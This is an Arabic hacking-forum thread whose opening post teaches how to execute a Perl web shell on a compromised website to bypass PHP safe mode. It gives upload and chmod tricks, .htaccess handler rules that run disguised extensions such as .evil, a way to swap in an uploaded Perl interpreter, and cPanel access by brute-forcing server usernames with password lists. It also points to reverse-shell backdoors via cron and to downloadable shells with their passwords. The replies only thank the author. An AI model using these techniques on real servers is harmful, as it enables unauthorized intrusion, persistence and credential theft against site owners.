1. virus-3sir

    virus-3sir Developer

    الأنتساب:
    ‏28 يوليو 2012
    المشاركات:
    1
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركـآته

    موضوعنـآ اليوم من أهم المواضيع
    ويتكلم عـن طرق تشغيــل البيرل على السيرفر
    وساقوم فيه بطرح جميـع مآلدي من طرق بـ إذن الله
    وهي ليست من اكتشافي ..
    ولكنها مما تعلمته وجمعتـه فـ قمت بشرحه


    أولا: مآهو البيــرل - وماهي فائدته

    البيرل " Perl" عباره عن لغـه من لغات البرمجـه كـ php + python وغيرهـآ
    وكلمة perl إختصار لـ Practical Extraction and Report ********
    وتنتهـي الملفـآت المكتوبه بـ لغة البيرل بـ الامتدآد pl
    مثال "shell.pl"

    وفائدة البيرل بالنسبه للإختراق
    تكمن في رفعه على الموقع المخترق وتشغيله
    فـ إذا استطعت تشغيل البيرل تتخطى الحمايه وتستطيع تنفيذ اي أمر منه ..
    حتى لو كآن SAFE MODE:ON والدوآل محجوبه


    نـأتي الآن الى طرق تشغيــل البيرل على السيرفر

    أولا :
    في حآلة كآن SAFE MODE : OFF
    والدوآل معطله ..

    [​IMG]

    اي انك تستطيع تنفيذ الأوامر من الشيل العادي

    قم برفع ملف البيرل مثلا اسمه "shell.pl" وأعطه تصريح 755
    عن طريق الامر التالي:

    كود PHP:
    chmod 755 shell.pl
    ثم قم بـ إستعراضه من المتصفح www.site.com/shell.pl

    وسوف يعمل بـ إذن الله

    [​IMG]

    نأتي الآن لطرق تشغيله في حآلة فعالية الوضع الامن SAFE MODE : ON
    كما نشاهد الصوره الان

    [​IMG]

    أي أنـك لاتستطيع تنفيذ أي أمر نهـآئيا

    هنـآك عدة حلول

    أولا:
    عن طريق دآلة chmod
    اذا لم تكون موجوده ضمن الدوال المحظوره " Disable functions "

    نقوم بعمل ملف نسميه مثلا "chmod.php"
    ونضع بدآخله الكود التـآلي

    كود PHP:
     <?php
    chmod 
    ("shell.pl","0755");
    ?> 

    مع تغيير shell.pl الى اسم اداة البيرل المرفوعه
    ونقوم برفع الملف بنفس مسار البيرل
    ثم نقوم باستعراض الملف chmod.php في المتصفح
    www.site.com/chmod.php

    اذا ظهرت لنا صفحه بيضاء عند استعراضه..
    فهذا دليل على نجاح العمليه
    نعود الى الشيل ونحدثه .. نجد ان ملف البيرل تم تصريحه 755 بنجاح
    ونقوم باستعراضه

    وهنـآك ايضا انوآع من الشيـلآت توجد فيها خاصية تعديل التصريح
    من ضمنها شيل milw0rm وغيره
    ضع مسار ملف البيرل وإسمه واعطه تصريح 755
    كما في الصوره

    [​IMG]


    وايضا جرب ترفع البيرل في مجلد cgi-bin اذا وجد ..
    وقم بتصريحه باحدى الطرق السابقه واستعراضه
    www.site.com/cgi-bin/shell.pl

    أيضا تستطيع تصريحه عن طريق الاتصال العكسي اذا استطعت الاتصال
    وهنـآك شيلات تستطيع عن طريقها الاتصال العكسي مثل r57 وغيره

    [​IMG]

    وسيتم باذن الله شرح جميع طرق الاتصال العكسي
    ولكن في موضوع منفصل .. حتى لانخرج عن موضوعنآ

    ~

    أحيانا عند تصريح البيرل واستعراضه .. يخرج لك على شكل نصي
    أي يعرض لك مصدر الملف ..
    وحل ذلك .. قم بفتح ملف البيرل وتعديله واستبدل

    كود PHP:
    #!/usr/bin/perl
    اللتي في اول سطر .. الى

    كود PHP:
    #!/usr/bin/perl -I/usr/local/bandmin
    واذا لم تنفع استبدلها الى

    كود PHP:
    #!/home/USER/public_html
    ضع مكآن USER يوزر موقعك ومسار الملف

    نـأتي الان لطريقة تصريح البيرل من السيبانل cpanel

    احيآنا لاتنفع الطرق السابقه وعليك بالحصول على سيبانل
    وللحصول على سيبانل
    قم بتجربة باسوورد كونفق الموقع المتواجد عليه ويوزر الموقع
    وحاول الدخول بهآ للوحه ..
    او قم بـجمع عدد من يوزرات السيرفر مع يوزر موقعك
    وخمن عليها بواسطة احد سكربتات التخمين ولستتة باسسوردات


    بعد الحصول على سيبانل ودخول اللوحه
    نذهب الى File Manager "مدير الملفات"

    [​IMG]

    ونذهب الى مجلد رئيسية الموقع " public_html "
    او اي مجلد عليها
    ونرفع ملف البيرل .. ونقوم باعطائه تصريحه 755 كما في الصوره

    [​IMG]

    وتستطيع ايضا عن طريق السي بانل رفع باك دور
    والاتصال به عكسيا عن طريق corn job
    وهذا سيتم شرحه في موضوع خاص بالاتصال العكسي

    تشغيل البيرل عن طريق تغيير امتدآده ~

    أي تشغيله بـ أي أمتداد آخر غير pl يصبح pp مثلا "perl.pp"

    نقوم الان بعمل مجلد جديد .. او ندخل مجلد اخر غير اللي عليه الشيل
    حتى لايقوم الـ هاتكسس بـ إفساد الشيل

    نقوم برفع ملف البيرل المغير امتداده "perl.pp"
    وملف الهاتكسس بمجلد وآحد

    ضع بملف الهاتكسس الكود التالي


    كود PHP:
    Options FollowSymLinks MultiViews Indexes ExecCGI

    AddType application
    /x-httpd-cgi .pp

    AddHandler cgi
    -script .pp
    AddHandler cgi
    -script .pp
    غير pp الى الامتداد اللى نفس امتداد البيرل المعدل اللي رفعته
    وقم باعطآء ملف البيرل "perl.pp" تصريح 755 باي طريقه من الطرق السابقه
    ثم قم باستعراضه من المتصفح .. مثال
    www.site.com/xxx/perl.pp
    غير xxx الى اسم المجلد اللي رفعت فيه


    او قم برفع الملف التالي
    xa7m3d.php
    لتحميل الملف من هنـآ
    xa7m3d

    بعد ماتقوم برفع الملف xa7m3d.php
    قم بـ إستعراضه مثلا

    كود:
    [COLOR=DarkGreen][COLOR=DarkGreen]www.site.com/[COLOR=DarkRed]xa7m3d.php[/COLOR][/COLOR][/COLOR]


    سوف يخرج لك صفحه بيضاء مكتوب فيها العباره التاليه

    كود PHP:
    Done .. You Will Find File As xa7m3d/xa7m3d.evil Open It And Password To Login xa7m3d ### This Tool Coded By Xa7m3d
    يعني ان العمليه نجحت
    وهذا السكربت عندمآ تقوم بـمجرد إستعراضه
    يعمل لك مجلد بـ إسم xa7m3d
    ويضع فيه الأدوآت "الهاتكسس+شيل بيرل مغير امتدآده ومصرح جاهز"
    نخش على مجلد xa7m3d من المتصفح

    كود:
    www.site.com/[COLOR=DarkRed]xa7m3d[/COLOR]


    نجد شيل البيرل أمـآمنا بـ إسم xa7m3d.evil
    كما نرى في الصوره


    [​IMG]

    نقوم باستعراضه
    www.site.com/xa7m3d/xa7m3d.evil

    ونجد شيل البيرل أمآمنا
    ملاحضه .. بـآسوورد شيل البيرل : xa7m3d

    وعند رفعك لادوآت بيرل أخرى مثل ادوآت سحب الكونفج او اليوزرات
    ارفعها بنفس المجلد
    وغير امتدادها لنفس امتداد شل البيرل المعدل "evil" مثلا "config.evil"
    لكن قم بتصريحها اذا رفعتهـآِ .. ~

    تشغيـل البيرل عن طريق رفع مترجم للبيرل

    أولا قم بتحميل مترجم البيرل

    رفعته لكم هنا

    ط§ظ„ظ…طھط±ط¬ظ…

    نقوم بعمل مجلد جديد

    وان لم نستطع نذهب لأي مجلد فرعي اخر غير مجلد الشيل الرئيسي
    ونرفع فيه المترجم + شيل البيرل "مغير امتداده" + هاتكسس
    نعطي مترجم البيرل تصريح 755


    كود PHP:
    chmod 755 kh

    kh = اسم المترجم ~ أو نصرحه برفع ملف كما في بداية الموضوع
    اذا لم تكن دالة chmod محظوره
    ونصرح شيل البيرل ايضا نفس التصريح
    ويكون كود الهاتكسس كالتالي


    كود PHP:
    Options FollowSymLinks MultiViews Indexes ExecCGI

    AddType application
    /x-httpd-cgi .pp

    AddHandler cgi
    -script .pp
    AddHandler cgi
    -script .pp
    "pp" غيره لامتداد البيرل الذي رفعته
    وافتح شيل البيرل واحذف فيه السطر الاول

    كود PHP:
    #!/usr/bin/perl 
    وضع مكانها
    كود PHP
    :
    #!kh -w 
    يعني غيرنا مسار البيرل الاعتيادي في السيرفرات الى مترجمنا
    وبـ إذن الله يشتغل البيرل


    هذا كل مالدي حآليا ..
    وبـ إذن الله في قادم الايام سيتم التطرق لأمور أخرى

    البعض قد لايعرف كيف يتعامل مع شيل البيرل
    لانه مجرد سطر اوامر
    وللمعلوميه .. كل ماتفعله في الشيل العادي عباره عن اوامر
    نفذها في شيل البيرل .. لايوجد إختلاف سوى اختلاف بسيط
    بعض الاوامر المهمـه " المختلفه"

    امر دخول مجلد معين

    كود PHP:
    cd folder

    غير folder لاسم المجلد

    أمر الرجوع للمجلد السابق أو للخلف

    كود PHP:
    cd ../ 
    امر استعراض الملفات في المجلد المتواجد عليه

    كود PHP:
    ls

    امر استعراض الملفات وتصاريحها

    كود PHP:
    ls -la


    معلومات عن السيرفر

    كود PHP:
    u**** -a

    قراة ملف معين مثلا "a.txt"

    كود PHP:
    cat a.txt


    حذف ملف معين مثلا "a.txt"

    كود PHP:
    rm a.txt

    أمر سحب ملف معين من موقع آخر مثلا "a.txt"

    كود PHP:
    wget http://www.site.com/a.txt

    قم بالبحث عن أوامر الليونكس وأستعملها
    ونصيحه أبعد عن " النسخ واللصق "
    حتى تحفظ الاوامر مع الايام ومع التطبيق المتكرر

    لتحميل شيل البيرل من هنـآ

    sh

    باسسورد الشيل v-3

    تــم الكلام وربنـآ المحمود .. وله المكآرم والعـلآ والجود

    ~

    ولا اسمح من يقوم بنقله حرفيا بالكامل إلآ بذكر الحقوق

    أخوكم virus-3sir

    في أمـآن الله

     
  2. ! ـآوتآر !

    ! ـآوتآر ! DeveloPer Plus

    الأنتساب:
    ‏19 يوليو 2012
    المشاركات:
    192
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    الإقامة:
    السـ جــــده ـعوديـة
    رد: طرق تشغيل البيرل على السيرفر

    السسلام عليڪم ورحمة الله و برڪاته :|

    بارڪ الله فيڪ اخي

    موفقڪ ً#ٌ5oًًًُ.​
     
  3. ИмЯ

    ИмЯ Active DeveloPer

    الأنتساب:
    ‏6 نوفمبر 2012
    المشاركات:
    84
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: طرق تشغيل البيرل على السيرفر

    يعطيك العافية أخوي وما قصرت ^:"
     
  4. Jankaro

    Jankaro Developer

    الأنتساب:
    ‏22 نوفمبر 2012
    المشاركات:
    52
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الإقامة:
    EgYpT
    رد: طرق تشغيل البيرل على السيرفر

    مشكور اخى الغالى على الطرح المميز
     
  5. ByGhazi2010

    ByGhazi2010 Developer

    الأنتساب:
    ‏20 مايو 2013
    المشاركات:
    52
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: طرق تشغيل البيرل على السيرفر

    وعليكم السلآم ،
    الله يعطيك العافية ،
    شرح سلس
     
  6. m0j4hed

    m0j4hed Developer

    الأنتساب:
    ‏20 يناير 2012
    المشاركات:
    51
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    إڪَيدِ فِيَ ﭰـ♥ـڷبڪَ
    رد: طرق تشغيل البيرل على السيرفر

    بارك الله فيك يالغالي .. :{1}:
     
  7. الحاق1

    الحاق1 Developer

    الأنتساب:
    ‏17 سبتمبر 2014
    المشاركات:
    53
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: طرق تشغيل البيرل على السيرفر

    بارك الله بك و نفع بك
     

مشاركة هذه الصفحة